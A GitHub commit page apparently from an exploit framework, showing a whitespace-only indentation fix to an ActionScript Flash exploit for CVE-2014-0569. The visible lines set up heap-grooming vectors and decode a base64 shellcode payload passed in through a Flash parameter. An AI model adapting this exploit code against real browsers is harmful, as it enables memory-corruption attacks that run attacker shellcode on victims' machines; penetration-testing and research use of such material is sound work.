Skip to content

Commit 5bab1cf

Browse files
committed
Fix indentation
1 parent 39851d2 commit 5bab1cf

File tree

1 file changed

+11
-11
lines changed

1 file changed

+11
-11
lines changed

external/source/exploits/CVE-2014-0569/Exploit.as

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -22,10 +22,10 @@ package
2222
private var uv:Vector.<uint>
2323
private var ba:ByteArray
2424
private var b64:Base64Decoder = new Base64Decoder();
25-
private var payload:ByteArray
26-
private var platform:String
27-
private var os:String
28-
private var exploiter:Exploiter
25+
private var payload:ByteArray
26+
private var platform:String
27+
private var os:String
28+
private var exploiter:Exploiter
2929
private var defrag:Vector.<Object> = new Vector.<Object>(100)
3030
private var ov:Vector.<Object> = new Vector.<Object>(200)
3131

@@ -34,13 +34,13 @@ package
3434
var i:uint = 0
3535
var j:uint = 0
3636

37-
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
38-
os = LoaderInfo(this.root.loaderInfo).parameters.os
39-
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
40-
var pattern:RegExp = / /g;
41-
b64_payload = b64_payload.replace(pattern, "+")
42-
b64.decode(b64_payload)
43-
payload = b64.toByteArray()
37+
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
38+
os = LoaderInfo(this.root.loaderInfo).parameters.os
39+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
40+
var pattern:RegExp = / /g;
41+
b64_payload = b64_payload.replace(pattern, "+")
42+
b64.decode(b64_payload)
43+
payload = b64.toByteArray()
4444

4545
for (i = 0; i < defrag.length; i++) {
4646
defrag[i] = new ByteArray()

0 commit comments

Comments
 (0)